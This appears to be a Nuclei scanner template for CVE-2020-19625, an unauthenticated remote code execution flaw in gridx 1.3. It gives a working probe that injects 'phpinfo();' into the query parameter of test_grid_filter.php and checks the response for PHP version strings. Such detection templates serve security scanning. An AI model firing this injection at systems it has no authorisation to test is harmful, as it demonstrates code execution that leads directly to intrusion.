id: CVE-2020-19625 info: name: Gridx 1.3 RCE author: geeknik description: Remote Code Execution vulnerability in tests/support/stores/test_grid_filter.php in oria gridx 1.3, allows remote attackers to execute arbitrary code, via crafted value to the $query parameter. reference: https://github.com/oria/gridx/issues/433 severity: critical tags: cve,cve2020,gridx,rce classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2020-19625 requests: - method: GET path: - "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "PHP Extension" - "PHP Version" condition: and extractors: - type: regex part: body group: 1 regex: - '

PHP Version ([0-9.]+)<\/h1>'